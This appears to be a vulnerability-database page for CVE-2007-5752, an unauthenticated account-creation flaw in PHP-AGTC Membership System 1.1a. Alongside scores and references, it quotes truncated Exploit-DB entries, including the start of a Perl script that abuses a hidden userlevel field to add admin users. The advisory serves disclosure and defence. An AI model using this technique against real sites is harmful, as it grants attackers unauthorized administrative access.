CVE-2007-5752
published 2007-10-31CVE-2007-5752: adduser.php in PHP-AGTC Membership (AGTC-Membership) System 1.1a does not require authentication, which allows remote attackers to create accounts via a…
PriorityP347high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.81%
84.7th percentile
adduser.php in PHP-AGTC Membership (AGTC-Membership) System 1.1a does not require authentication, which allows remote attackers to create accounts via a modified form, as demonstrated by an account with admin (userlevel 4) privileges.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| agtc_websolutions | php-agtc_membership_system | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
PHP-AGTC Membership System 1.1a - Arbitrary Add Admin
exploitdb·2008-05-18
CVE-2007-5752 PHP-AGTC Membership System 1.1a - Arbitrary Add Admin
PHP-AGTC Membership System 1.1a - Arbitrary Add Admin
---
#!/usr/bin/perl
# Note: adduser.php is accessable to a guest/any-user, but if you access through a browser you cant add admin, theres a hidden POST buried in the script, which contains the userlevel.
# Note: alot of sites run this script and they remove the "powered by" dork. Also you can get access to alot of nice site's member sections using this, since its a member management script.
use strict;
use LWP::UserAgent;
print "-+--[ PHP AGTC-Membership System );
print "\nAdmin Username(create's your admin username): ";
chomp(my $usr=);
print "\nAdmin Password(create's your admin password): ";
chomp(my $pwd=);
my $email = "user".int(rand(9999))."\@localhost.com"; # generates a random email, if a attacker has already exploited t
Exploit-DB
PHP-AGTC Membership System 1.1a - Remote Add Admin
exploitdb·2007-10-30
CVE-2007-5752 PHP-AGTC Membership System 1.1a - Remote Add Admin
PHP-AGTC Membership System 1.1a - Remote Add Admin
---
AGTC-Membership system v1.1a (adduser) Remote Add
Admin Exploit
User Name:
Password:
Email Address:
# milw0rm.com [2007-10-30]
http://secunia.com/advisories/27430http://securityreason.com/securityalert/3326http://www.securityfocus.com/archive/1/482919/100/0/threadedhttp://www.securityfocus.com/bid/26255https://exchange.xforce.ibmcloud.com/vulnerabilities/38173http://secunia.com/advisories/27430http://securityreason.com/securityalert/3326http://www.securityfocus.com/archive/1/482919/100/0/threadedhttp://www.securityfocus.com/bid/26255https://exchange.xforce.ibmcloud.com/vulnerabilities/38173
2007-10-31
Published